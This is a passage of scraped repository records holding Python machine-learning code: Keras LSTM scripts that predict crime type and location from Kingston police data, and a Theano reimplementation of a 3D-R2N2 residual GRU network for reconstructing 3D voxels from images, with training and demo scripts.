DATASET\n'''\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67)\ntest_size = int(len(dataframe)-train_size)\n\ntrain_main, test_main = dataframe[0:train_size,9:11], dataframe[train_size:len(dataframe),9:11]\n\ndef create_database(dataset,look_back=1):\n dataX, dataY = [], []\n for i in range(len(dataset)-look_back-1):\n a= dataset[i:(i+look_back),:]\n dataX.append(a)\n dataY.append(dataset[i+look_back,:])\n return numpy.array(dataX), numpy.array(dataY)\n\n\ntrainX_main, trainY_main = create_database(train_main,4)\ntestX_main, testY_main = create_database(test_main,4)\n\ntrainX_main = numpy.reshape(trainX_main,(trainX_main.shape[0],4,2))\ntestX_main = numpy.reshape(testX_main,(testX_main.shape[0],4,2))\n\n'''\nRUN THE NEURAL NET\n'''\n\nmodel=Sequential()\nmodel.add(LSTM(32,input_dim=2))\nmodel.add(Dense(2))\nmodel.compile(loss='mean_squared_error',optimizer='adam',metrics=['accuracy','categorical_accuracy'])\nmodel.fit(trainX_main, trainY_main, nb_epoch=10,batch_size=10, verbose=2)\n\nscore = model.evaluate(testX_main,testY_main,batch_size=10)\n\nprint(score)\n\nmodel.save('PredictLocation.h5')\n" }, { "alpha_fraction": 0.7280966639518738, "alphanum_fraction": 0.7430247068405151, "avg_line_length": 30.79096031188965, "blob_id": "bf63c6be141afe5038e86b126a031921a2ed932d", "content_id": "98289fcf804920b8a8d51211bf5bd72433e45daf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5627, "license_type": "no_license", "max_line_length": 108, "num_lines": 177, "path": "/Project/CrimeTypeMerged.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "'''\nPredicts upcoming crime type using last look_back crime types\n'''\nimport numpy\nimport matplotlib.pyplot as plt\nfrom keras.utils.visualize_util import plot\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dropout\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Merge\nfrom keras.layers import Input\nfrom keras.layers import Embedding\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n'''\nTHIS FILE RUNS THE NEURAL NETWORK BY\nDEFINING THE ARCHITECTURE AND TRAINING IT.\nIT WILL ALSO TEST USING THE EVALUATE METHOD.\nWILL ALSO PRINT OUT A FILE WITH THE PREDICTED CLASSES\nUSING THE NEURAL NETWORK.\nRUN PROCESS_DATA.PY FIRST, THEN RUN THIS.\n'''\n\n\n'''\nSet the seed for the sake of being able to repeat the results\n'''\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67) #Train dataset length of 2/3rds into the dataset\ntest_size = int(len(dataframe)-train_size) #Test dataset length 1/3rd of the dataset\n\n#Retrieving crime type from dataframe\ntrain_main_type = dataframe[0:train_size,:6]\ntest_main_type = dataframe[train_size:len(dataframe),:6]\n\n#Retrieving hour Of Year from dataframe\ntrain_DOY_main = dataframe[0:train_size,11:13]\ntest_DOY_main = dataframe[train_size:len(dataframe),11:13]\n\n#Retrieving location from dataframe\ntrain_loc_main = dataframe[0:train_size,19:]\ntest_loc_main = dataframe[train_size:len(dataframe),19:]\n\n\n'''\ncreate_database will create a numpy array with each\ndatapoint having x number of previous data points.\n'''\ndef create_database(dataset,look_back=1):\n #3D arrays: len(dataset) X number of datapoints X features per datapoint\n dataX = [] #datapoints are arrays containing last look_back crime types\n dataY = [] #datapoints are the upcoming crime type\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back),:])\n dataY.append(dataset[i+look_back,:])\n\n return numpy.array(dataX), numpy.array(dataY)\n\ndef create_database_1(dataset,look_back=1):\n dataX = []\n dataY = []\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back)])\n dataY.append(dataset[i+look_back])\n\n return numpy.array(dataX), numpy.array(dataY)\n\n'''\nUsing create_database to get the 4 previous values for each datapoint.\nCreates a 3D numpy array.\n'''\n#X: input, Y: expected output\ntrainX_main, trainY_main = create_database(train_main_type,5)\ntestX_main, testY_main = create_database(test_main_type,5)\n\ntrainX_DOY, trainY_DOY = create_database(train_DOY_main,5)\ntestX_DOY, testY_DOY = create_database(test_DOY_main,5)\n\ntrainX_loc, trainY_loc = create_database_1(train_loc_main,5)\ntestX_loc, testY_loc = create_database_1(test_loc_main, 5)\n'''\nProperly reshaping the data so that network can take it.\n'''\ntrainX_main = numpy.reshape(trainX_main,(trainX_main.shape[0],5,6))\ntestX_main = numpy.reshape(testX_main,(testX_main.shape[0],5,6))\n\nprint(\"Reshape Type\",trainX_main.shape,testX_main.shape)\n\ntrainX_DOY = numpy.reshape(trainX_DOY,(trainX_DOY.shape[0],5,2))\ntestX_DOY = numpy.reshape(testX_DOY,(testX_DOY.shape[0],5,2))\n\nprint(\"Reshape HOY\",trainX_DOY.shape,testX_DOY.shape)\n\ntrainX_loc = numpy.reshape(trainX_loc,(trainX_loc.shape[0],5,1))\ntestX_loc = numpy.reshape(testX_loc,(testX_loc.shape[0],5,1))\n\nprint(\"Reshape Location\", trainX_loc.shape, testX_loc.shape)\n\n'''\nMake a neural network with LSTM and dense of 2 output\nfor the hour of year feature.\n'''\nDOY_Branch = Sequential()\nDOY_Branch.add(LSTM(32,return_sequences=False,input_dim = 2))\nDOY_Branch.add(Dense(2))\n\n'''\nMake a neural network with LSTM and dense of 6 output\nfor the Type of crime feature.\n'''\nType_Branch = Sequential()\nType_Branch.add(LSTM(32,return_sequences=False,input_dim = 6))\nType_Branch.add(Dense(6))\n\n'''\nMake a neural network with LSTM and dense of 2 output\nfor the location feature.\n'''\nLoc_Branch = Sequential()\nLoc_Branch.add(LSTM(32,return_sequences=False,input_dim=1))\nLoc_Branch.add(Dense(1))\n\n'''\nThe final model takes a merge of all three previous models\nand concatenates and passes to a dense layer which outputs the\n6 possible categories.\n'''\nfinal_model = Sequential()\nfinal_model.add(Merge([DOY_Branch, Type_Branch, Loc_Branch], mode='concat'))\nfinal_model.add(Dense(6,activation='softmax'))\n\n'''\nModel is compiled with an ADAM optimizer and loss function is\nmean squared error. The metrics are accuracy and categorical_accuracy.\n'''\nfinal_model.compile(optimizer='adam', loss='mean_squared_error',metrics=['accuracy','categorical_accuracy'])\n\n'''\nTrain model using training dataset\n'''\nfinal_model.fit([trainX_DOY, trainX_main, trainX_loc], trainY_main, nb_epoch=10,batch_size=10, verbose=2)\n\n'''\nEvaluate the model using the testing dataset.\n'''\ntry:\n print(\"Evaluating:\")\n score = final_model.evaluate([testX_DOY, testX_main, testX_loc], testY_main, batch_size = 10)\n print (\"Score is : \"+score)\nexcept:\n print(\" Couldn't evaluate due to nonetype error\")\n'''\nSave the model and the weights.\n'''\nfinal_model.save('FunctionMergeCrimeHOYClusterLoc.h5')\n\n'''\nPredict the output using all elements of the training dataset\nand the test dataset.\n'''\ntrainPredict = final_model.predict([trainX_DOY, trainX_main, trainX_loc])\ntestPredict = final_model.predict([testX_DOY, testX_main, testX_loc])\n\n'''\nSave the output of the predict_classes.\n'''\nnumpy.savetxt(\"resultstrainpredict.csv\", trainPredict, delimiter=\",\")\nnumpy.savetxt(\"resultstestpredict.csv\",testPredict,delimiter=\",\")\n" }, { "alpha_fraction": 0.7092411518096924, "alphanum_fraction": 0.729526698589325, "avg_line_length": 27.319149017333984, "blob_id": "97d4161cbd5fcee8969175a8304d2910d0f49588", "content_id": "fd9b2d961257ff2817643cf1d3739cc0b6627ee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1331, "license_type": "no_license", "max_line_length": 77, "num_lines": 47, "path": "/Saved/Project_prev.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "import numpy\nimport matplotlib.pyplot as plt\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67)\ntest_size = int(len(dataframe)-train_size)\n\ntrain, test=dataframe[0:train_size,:], dataframe[train_size:len(dataframe),:]\nprint(len(train),len(test))\n\ndef create_database(dataset,look_back=1):\n dataX, dataY = [], []\n for i in range(len(dataset)-look_back-1):\n a= dataset[i:(i+look_back),:]\n dataX.append(a)\n dataY.append(dataset[i+look_back,:])\n return numpy.array(dataX), numpy.array(dataY)\n\nlook_back = 1\ntrainX, trainY = create_database(train,look_back)\ntestX, testY = create_database(test,look_back)\ntrainX = numpy.reshape(trainX,(trainX.shape[0],1,9))\ntestX = numpy.reshape(testX,(testX.shape[0],1,9))\n\nprint(trainX[0])\n\n'''\nmodel=Sequential()\nmodel.add(LSTM(16,input_dim=look_back*4+5))\nmodel.add(Dense(9))\nmodel.compile(loss='mean_squared_error',optimizer='adam')\nmodel.fit(trainX, trainY, nb_epoch=100,batch_size=10, verbose=2)\n\n\n\nmodel.save('my_model.h5')\n'''\n" } ]
11
JoshuaTellez/Comp-Vision_CS519
https://github.com/JoshuaTellez/Comp-Vision_CS519
0b3c72933787430631271c548eb7caedfe5365ab
b1679845b9836ace4922e10d4aa5ce3aa79ba57b
07de3d98b44a45da64183677e8d61a984490c14b
refs/heads/master
2021-08-23T13:14:23.740565
2017-12-05T01:43:07
2017-12-05T01:43:07
113,016,795
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6205157041549683, "alphanum_fraction": 0.6390134692192078, "avg_line_length": 27.774192810058594, "blob_id": "6c11522ec06f5b4f6299beb882471991c021cce3", "content_id": "9ee992406bcddbd0f9e83d05429101d13556f460", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1784, "license_type": "no_license", "max_line_length": 89, "num_lines": 62, "path": "/my_demo.py", "repo_name": "JoshuaTellez/Comp-Vision_CS519", "src_encoding": "UTF-8", "text": "# Modules used\nimport sys\nimport shutil\nimport numpy as np\nfrom subprocess import call\nfrom PIL import Image\n\n# From library by authors\nfrom lib.solver import Solver\nfrom lib.voxel import voxel2obj\n\n# my reimplimentation\nfrom my_3DR2N2.my_res_gru_net import My_ResidualGRUNet\n\n# Load image(s)\ndef load_demo_images(num_imgs,img_file):\n\n # Resize the image(s) to be compatible\n size = 127, 127\n ims = []\n\n # Load all images\n for i in range(num_imgs):\n # Make images compatible\n im = Image.open(img_file + '/%d.png' % i).convert('RGB')\n\n # Resize image\n im.thumbnail(size)\n ims.append([np.array(im).transpose(\n (2, 0, 1)).astype(np.float32) / 255.])\n\n return np.array(ims)\n\n\ndef main():\n # Save prediction into a file named 'prediction.obj' or the given argument\n pred_file_name = sys.argv[1] if len(sys.argv) > 1 else 'prediction.obj'\n\n num_imgs = int(sys.argv[2]) if len(sys.argv) > 2 else 1\n img_file = sys.argv[3]\n\n # load images\n demo_imgs = load_demo_images(num_imgs,img_file)\n\n # Define a network and a solver. Solver provides a wrapper for the test function.\n my_net = My_ResidualGRUNet(batch=1) # instantiate a network\n my_net.load('my_3DR2N2/weights.npy') # load downloaded weights\n solver = Solver(my_net) # instantiate a solver\n\n # Run the network\n voxel_prediction, _ = solver.test_output(demo_imgs)\n\n # Save the prediction to a mesh file).\n voxel2obj(pred_file_name, voxel_prediction[0, :, 1, :, :] > 0.4)\n\n if shutil.which('meshlab') is not None:\n call(['meshlab', pred_file_name])\n else:\n print('Meshlab not found: please use visualization of your choice to view %s' %\n pred_file_name)\n\nmain()\n" }, { "alpha_fraction": 0.6770244836807251, "alphanum_fraction": 0.685969889163971, "avg_line_length": 27.31999969482422, "blob_id": "db695d54a8b0e04ff22222e550fca2e16e9ef68e", "content_id": "80af343b07f2d4c54cccfc4213fb40cd5a4204a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2124, "license_type": "no_license", "max_line_length": 93, "num_lines": 75, "path": "/my_train_net.py", "repo_name": "JoshuaTellez/Comp-Vision_CS519", "src_encoding": "UTF-8", "text": "# Modules used\nfrom multiprocessing import Queue\n\n# From Library by authors\nfrom lib.solver import Solver\nfrom lib.data_io import category_model_id_pair\nfrom lib.data_process import kill_processes, make_data_processes\n\n# My reimplementation\nfrom my_3DR2N2.my_res_gru_net import My_ResidualGRUNet\n\n# Define globally accessible queues, will be used for clean exit when force\ntrain_queue, validation_queue, train_processes, val_processes = None, None, None, None\n\n# Clean up in case of unexpected quit\ndef cleanup_handle(func):\n def func_wrapper(*args, **kwargs):\n try:\n return func(*args, **kwargs)\n except:\n print('Wait until the dataprocesses to end')\n kill_processes(train_queue, train_processes)\n kill_processes(validation_queue, val_processes)\n raise\n\n return func_wrapper\n\n\n# Train the network\n@cleanup_handle\ndef train_net():\n\n # Set up the model and the solver\n my_net = My_ResidualGRUNet()\n\n # Generate the solver\n solver = Solver(my_net)\n\n # Load the global variables\n global train_queue, validation_queue, train_processes, val_processes\n\n # Initialize the queues\n train_queue = Queue(15) # maximum number of minibatches that can be put in a data queue)\n validation_queue = Queue(15)\n\n # Train on 80 percent of the data\n train_dataset_portion = [0, 0.8]\n\n # Validate on 20 percent of the data\n test_dataset_portion = [0.8, 1]\n\n # Establish the training procesesses\n train_processes = make_data_processes(\n train_queue,\n category_model_id_pair(dataset_portion=train_dataset_portion),\n 1,\n repeat=True)\n\n # Establish the validation procesesses\n val_processes = make_data_processes(\n validation_queue,\n category_model_id_pair(dataset_portion=test_dataset_portion),\n 1,\n repeat=True,\n train=False)\n\n # Train the network\n solver.train(train_queue, validation_queue)\n\n # Cleanup the processes and the queue.\n kill_processes(train_queue, train_processes)\n kill_processes(validation_queue, val_processes)\n\n\ntrain_net()\n" }, { "alpha_fraction": 0.48963961005210876, "alphanum_fraction": 0.5424331426620483, "avg_line_length": 39.960784912109375, "blob_id": "331a468e317ff909cd36bc6ffee3f5e0772f70e8", "content_id": "1823ebe2c39825f31d6b930608527d5fdd7abe48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14623, "license_type": "no_license", "max_line_length": 123, "num_lines": 357, "path": "/my_res_gru_net.py", "repo_name": "JoshuaTellez/Comp-Vision_CS519", "src_encoding": "UTF-8", "text": "# Modules used\nimport numpy as np\nimport theano\nimport theano.tensor as tensor\nimport datetime as dt\n\n\n# Taken from original repository. All of the layers were made by authors\nfrom lib.layers import TensorProductLayer, ConvLayer, PoolLayer, Unpool3DLayer, \\\n LeakyReLU, SoftmaxWithLoss3D, Conv3DLayer, InputLayer, FlattenLayer, \\\n FCConv3DLayer, TanhLayer, SigmoidLayer, ComplementLayer, AddLayer, \\\n EltwiseMultiplyLayer, get_trainable_params\n\n# Initialize the tensor object\ntensor5 = tensor.TensorType(theano.config.floatX, (False,) * 5)\n\n# The Residual Gated Recurrent Unit Network my reimplementation\nclass My_ResidualGRUNet():\n\n # Initialize network parameters\n def __init__(self, random_seed=dt.datetime.now().microsecond, batch=36):\n\n # Initialize the random number generator\n self.rng = np.random.RandomState(random_seed)\n\n # Set the batch size\n self.batch_size = batch\n\n # Images should have a width and hieght of 127 x 127\n self.img_width = 127\n self.img_height = 127\n\n # The 3D Convolutional LSTM will be of 4 x 4 x 4 dimenstions\n self.n_gru_vox = 4\n\n # The input and output values are a 5D tensor object\n self.x = tensor5()\n self.y = tensor5()\n\n # list of activation functions\n self.activations = []\n\n # Final loss of network\n self.loss = []\n\n # Predicted output\n self.output = []\n\n # Error on predicted output when training\n self.error = []\n\n # Weights of all the layers\n self.params = []\n\n # Create the network structure\n self.network_definition()\n\n def network_definition(self):\n\n # Depth of the convolutional layers. VGG Style\n cnn_filters = [96, 128, 256, 256, 256, 256]\n\n # One fully connected layer for a 1024 feature vector\n fully_connecter_filter = [1024]\n\n # Shape of input layers. Used by encoder and GRU\n input_shape = (self.batch_size, 3, self.img_width, self.img_height)\n\n ######### Encoder ##########\n\n # Input Layer\n x = InputLayer(input_shape)\n\n ## First set of convolutional layers ##\n conv1a = ConvLayer(x, (cnn_filters[0], 7, 7)) # 96 x 7 x 7\n conv1b = ConvLayer(conv1a, (cnn_filters[0], 3, 3)) # 96 x 3 x 3\n pool1 = PoolLayer(conv1b) # Max Pooling\n\n ## Second set of convolutional layers ##\n conv2a = ConvLayer(pool1, (cnn_filters[1], 3, 3)) # 128 x 3 x 3\n conv2b = ConvLayer(conv2a, (cnn_filters[1], 3, 3)) # 128 x 3 x 3\n conv2c = ConvLayer(conv2b, (cnn_filters[1], 1, 1)) # 128 x 1 x 1\n pool2 = PoolLayer(conv2c) # Max Pooling\n\n ## Third set of convolutional layers ##\n conv3a = ConvLayer(pool2, (cnn_filters[2], 3, 3)) # 256 x 3 x 3\n conv3b = ConvLayer(conv3a, (cnn_filters[2], 3, 3)) # 256 x 3 x 3\n conv3c = ConvLayer(pool2, (cnn_filters[2], 1, 1)) # 256 x 1 x 1\n pool3 = PoolLayer(conv3b) # Max Pooling\n\n ## Fourth set of convolutional layers ##\n conv4a = ConvLayer(pool3, (cnn_filters[3], 3, 3)) # 256 x 3 x 3\n conv4b = ConvLayer(conv4a, (cnn_filters[3], 3, 3)) # 256 x 3 x 3\n pool4 = PoolLayer(conv4b) # Max Pooling\n\n ## Fifth set of convolutional layers ##\n conv5a = ConvLayer(pool4, (cnn_filters[4], 3, 3)) # 256 x 3 x 3\n conv5b = ConvLayer(conv5a, (cnn_filters[4], 3, 3)) # 256 x 3 x 3\n conv5c = ConvLayer(pool4, (cnn_filters[4], 1, 1)) # 256 x 1 x 1\n pool5 = PoolLayer(conv5b) # Max pooling\n\n ## Sixth set of convolutional layers ##\n conv6a = ConvLayer(pool5, (cnn_filters[5], 3, 3)) # 256 x 3 x 3\n conv6b = ConvLayer(conv6a, (cnn_filters[5], 3, 3)) # 256 x 3 x 3\n pool6 = PoolLayer(conv6b)\n\n # Flatten layer\n flat6 = FlattenLayer(pool6)\n\n # Fully Connected layer\n fc7 = TensorProductLayer(flat6, 1024) # 1024 feature vector\n\n ########## End Encoder ############\n\n\n ########## Gated Recurrent Unit ############\n\n # Filter size of layers within the unit\n gru_filters = [96, 128, 256, 256, 256, 256]\n\n # The 3D Convolutional LSTM has a grid structure of 4 x 4 x 4. 128 for first layer of decoder\n s_shape = (self.batch_size, self.n_gru_vox, gru_filters[1], self.n_gru_vox, self.n_gru_vox)\n\n # Initialize the first previous state to nothing\n prev_s = InputLayer(s_shape) # h(t-1)\n\n # 3 x 3 x 3 Convolution of hidden states of self and neighbors\n # Wfx T(xt) (+) Uf * h(t-1) + bf\n update_layer = FCConv3DLayer(prev_s, fc7, (gru_filters[1], gru_filters[1], 3, 3, 3)) # 128 x 3 x 3 x 3\n\n # Wix T(xt) (+) Ui * h(t-1) + bi\n reset_layer = FCConv3DLayer(prev_s, fc7, (gru_filters[1], gru_filters[1], 3, 3, 3)) # 128 x 3 x 3 x 3\n\n # Sigmoid (Wix T(xt) (+) Ui * h(t-1) + bi)\n reset_gate = SigmoidLayer(reset_layer)\n\n # rt (.) h(t-1)\n rs = EltwiseMultiplyLayer(reset_gate, prev_s) # Used for h(t)\n\n # Wh T(xt) (+) Uh * (rt (.) h(t-1) + bh\n hidden_state_layer = FCConv3DLayer(rs, fc7, (gru_filters[1], gru_filters[1], 3, 3, 3)) # 128 x 3 x 3 x 3\n\n # Recurrence unit\n def recurrence(x_curr, prev_s_tensor, prev_in_gate_tensor):\n\n # Input layer\n input_ = InputLayer(input_shape, x_curr)\n\n # GRU network same parameters as encoder\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv1a_ = ConvLayer(input_, (gru_filters[0], 7, 7), params=conv1a.params) # 96 x 7 x 7\n rect1a_ = LeakyReLU(conv1a_)\n conv1b_ = ConvLayer(rect1a_, (gru_filters[0], 3, 3), params=conv1b.params) # 96 x 3 x 3\n rect1_ = LeakyReLU(conv1b_)\n pool1_ = PoolLayer(rect1_)\n\n\n # Residual |=> -----------------=V\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv2a_ = ConvLayer(pool1_, (gru_filters[1], 3, 3), params=conv2a.params) # 128 x 3 x 3\n rect2a_ = LeakyReLU(conv2a_)\n conv2b_ = ConvLayer(rect2a_, (gru_filters[1], 3, 3), params=conv2b.params) # 128 x 3 x 3\n rect2_ = LeakyReLU(conv2b_)\n conv2c_ = ConvLayer(pool1_, (gru_filters[1], 1, 1), params=conv2c.params) # 128 x 1 x 1\n res2_ = AddLayer(conv2c_, rect2_)\n pool2_ = PoolLayer(res2_)\n\n # Residual |=> -----------------=V\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv3a_ = ConvLayer(pool2_, (gru_filters[2], 3, 3), params=conv3a.params) # 256 x 3 x 3\n rect3a_ = LeakyReLU(conv3a_)\n conv3b_ = ConvLayer(rect3a_, (gru_filters[2], 3, 3), params=conv3b.params) # 256 x 3 x 3\n rect3_ = LeakyReLU(conv3b_)\n conv3c_ = ConvLayer(pool2_, (gru_filters[2], 1, 1), params=conv3c.params) # 256 x 1 x 1\n res3_ = AddLayer(conv3c_, rect3_)\n pool3_ = PoolLayer(res3_)\n\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv4a_ = ConvLayer(pool3_, (gru_filters[3], 3, 3), params=conv4a.params) # 256 x 3 x 3\n rect4a_ = LeakyReLU(conv4a_)\n conv4b_ = ConvLayer(rect4a_, (gru_filters[3], 3, 3), params=conv4b.params) # 256 x 3 x 3\n rect4_ = LeakyReLU(conv4b_)\n pool4_ = PoolLayer(rect4_)\n\n # Residual |=> -----------------=V\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv5a_ = ConvLayer(pool4_, (gru_filters[4], 3, 3), params=conv5a.params) # 256 x 3 x 3\n rect5a_ = LeakyReLU(conv5a_)\n conv5b_ = ConvLayer(rect5a_, (gru_filters[4], 3, 3), params=conv5b.params) # 256 x 3 x 3\n rect5_ = LeakyReLU(conv5b_)\n conv5c_ = ConvLayer(pool4_, (gru_filters[4], 1, 1), params=conv5c.params) # 256 x 1 x 1\n res5_ = AddLayer(conv5c_, rect5_)\n pool5_ = PoolLayer(res5_)\n\n # Residual |=> -----------------=V\n # Conv -> leakyReLU -> Conv -> LeakyReLU -> Conv -> LeakyReLU -> MaxPooling\n conv6a_ = ConvLayer(pool5_, (gru_filters[5], 3, 3), params=conv6a.params) # 256 x 3 x 3\n rect6a_ = LeakyReLU(conv6a_)\n conv6b_ = ConvLayer(rect6a_, (gru_filters[5], 3, 3), params=conv6b.params) # 256 x 3 x 3\n rect6_ = LeakyReLU(conv6b_)\n res6_ = AddLayer(pool5_, rect6_)\n pool6_ = PoolLayer(res6_)\n\n # Flatten Layer\n flat6_ = FlattenLayer(pool6_)\n\n # Fully connected layer\n fc7_ = TensorProductLayer(flat6_, fully_connecter_filter[0], params=fc7.params)\n rect7_ = LeakyReLU(fc7_)\n\n # h(t-1)\n prev_s_ = InputLayer(s_shape, prev_s_tensor)\n\n # FC layer convoluted with hidden states\n update_layer_ = FCConv3DLayer(\n prev_s_,\n rect7_, (gru_filters[1], gru_filters[1], 3, 3, 3), # 128 x 3 x 3 x 3\n params=update_layer.params)\n\n # FC layer convoluted with hidden states\n reset_layer_ = FCConv3DLayer(\n prev_s_,\n rect7_, (gru_filters[1], gru_filters[1], 3, 3, 3), # 128 x 3 x 3 x 3\n params=reset_layer.params)\n\n # Sigmoid( Wfx T(xt) (+) Uf * h(t-1) + bf )\n update_gate_ = SigmoidLayer(update_layer_)\n\n # 1 - u(t)\n compliment_update_gate_ = ComplementLayer(update_gate_)\n\n # Sigmoid (Wix T(xt) (+) Ui * h(t-1) + bi)\n reset_gate_ = SigmoidLayer(reset_layer_)\n\n # rt (.) h(t-1)\n rs_ = EltwiseMultiplyLayer(reset_gate_, prev_s_)\n\n # Uh * rt (.) h(t-1) + bh\n hidden_layer_ = FCConv3DLayer(\n rs_, rect7_, (gru_filters[1], gru_filters[1], 3, 3, 3), params=hidden_state_layer.params) # 128 x 3 x 3 x 3\n\n tanh_layer = TanhLayer(hidden_layer_)\n\n # ht = (1 - ut) (.) h(t-1) (+) tanh( Uh * rt (.) h(t-1) + bh )\n gru_out_ = AddLayer(\n EltwiseMultiplyLayer(update_gate_, prev_s_),\n EltwiseMultiplyLayer(compliment_update_gate_, tanh_layer))\n\n return gru_out_.output, update_gate_.output\n\n\n s_update, _ = theano.scan(recurrence,\n sequences=[self.x], # along with images, feed in the index of the current frame\n outputs_info=[tensor.zeros_like(np.zeros(s_shape),\n dtype=theano.config.floatX),\n tensor.zeros_like(np.zeros(s_shape),\n dtype=theano.config.floatX)])\n\n # Update of all units\n update_all = s_update[-1]\n s_all = s_update[0]\n\n # Last hidden states. last timestep\n s_last = s_all[-1]\n\n\n ########## End GRU ##########\n\n\n ########## Decoder ##########\n\n # Depth of deconvolutional layers\n dcnn_filters = [128, 128, 128, 64, 32, 2]\n\n # Input Layer\n gru_s = InputLayer(s_shape, s_last)\n\n # Residual |=> ----------------------------------------------=V\n # Unpooling -> deconvolution -> LeakyReLU -> DeConv -> LeakyReLU ->\n unpool7 = Unpool3DLayer(gru_s)\n conv7a = Conv3DLayer(unpool7, (dcnn_filters[1], 3, 3, 3)) # 128 x 3 x 3 x 3\n rect7a = LeakyReLU(conv7a)\n conv7b = Conv3DLayer(rect7a, (dcnn_filters[1], 3, 3, 3)) # 128 x 3 x 3 x 3\n rect7 = LeakyReLU(conv7b)\n res7 = AddLayer(unpool7, rect7)\n\n # Residual |=> ----------------------------------------------=V\n # Unpooling -> deconvolution -> LeakyReLU -> DeConv -> LeakyReLU ->\n unpool8 = Unpool3DLayer(res7)\n conv8a = Conv3DLayer(unpool8, (dcnn_filters[2], 3, 3, 3)) # 128 x 3 x 3 x 3\n rect8a = LeakyReLU(conv8a)\n conv8b = Conv3DLayer(rect8a, (dcnn_filters[2], 3, 3, 3)) # 128 x 3 x 3 x 3\n rect8 = LeakyReLU(conv8b)\n res8 = AddLayer(unpool8, rect8)\n\n # Residual |=> ----------------------------------------------=V\n # Unpooling -> deconvolution -> LeakyReLU -> DeConv -> LeakyReLU ->\n unpool9 = Unpool3DLayer(res8)\n conv9a = Conv3DLayer(unpool9, (dcnn_filters[3], 3, 3, 3)) # 64 x 3 x 3 x 3\n rect9a = LeakyReLU(conv9a)\n conv9b = Conv3DLayer(rect9a, (dcnn_filters[3], 3, 3, 3)) # 64 x 3 x 3 x 3\n rect9 = LeakyReLU(conv9b)\n conv9c = Conv3DLayer(unpool9, (dcnn_filters[3], 1, 1, 1)) # 64 x 1 x 1 x 1\n res9 = AddLayer(conv9c, rect9)\n\n # Residual |=> ----------------------------------------------=V\n # Unpooling -> deconvolution -> LeakyReLU -> DeConv -> LeakyReLU ->\n conv10a = Conv3DLayer(res9, (dcnn_filters[4], 3, 3, 3)) # 32 x 3 x 3 x 3\n rect10a = LeakyReLU(conv10a)\n conv10b = Conv3DLayer(rect10a, (dcnn_filters[4], 3, 3, 3)) # 32 x 3 x 3 x 3\n rect10 = LeakyReLU(conv10b)\n conv10c = Conv3DLayer(rect10a, (dcnn_filters[4], 3, 3, 3)) # 32 x 3 x 3 x 3\n res10 = AddLayer(conv10c, rect10)\n\n # Last convolution\n conv11 = Conv3DLayer(res10, (dcnn_filters[5], 3, 3, 3)) # 2 x 3 x 3 x 3\n\n # Softmax layer\n softmax_loss = SoftmaxWithLoss3D(conv11.output)\n\n\n ########## End Decoder #########\n\n self.loss = softmax_loss.loss(self.y)\n self.error = softmax_loss.error(self.y)\n self.params = get_trainable_params()\n self.output = softmax_loss.prediction()\n self.activations = [update_all]\n\n\n # Save the weights to a file\n def save(self, filename):\n params_cpu = []\n for param in self.params:\n params_cpu.append(param.val.get_value())\n np.save(filename, params_cpu)\n print('saving network parameters to ' + filename)\n\n # Load parameters from file\n def load(self, filename, ignore_param=True):\n print('loading network parameters from ' + filename)\n params_cpu_file = np.load(filename)\n if filename.endswith('npz'):\n params_cpu = params_cpu_file[params_cpu_file.keys()[0]]\n else:\n params_cpu = params_cpu_file\n\n succ_ind = 0\n for param_idx, param in enumerate(self.params):\n try:\n param.val.set_value(params_cpu[succ_ind])\n succ_ind += 1\n except IndexError:\n if ignore_param:\n print('Ignore mismatch')\n else:\n raise\n" } ]
3
vorier/Data_master
https://github.com/vorier/Data_master
a65ceefb6d11eed7eda6bd2f7c1c32c757bbee86
4eb0d0fd30d21f9f5a15757f3730529eb28a75e5
75ec6a150f9e70278858ac54fc78c109a9f1feea
refs/heads/main
2023-01-27T21:03:44.627049
2020-12-11T18:14:30
2020-12-11T18:14:30
320,649,825
0
0
null
null
null
null
null
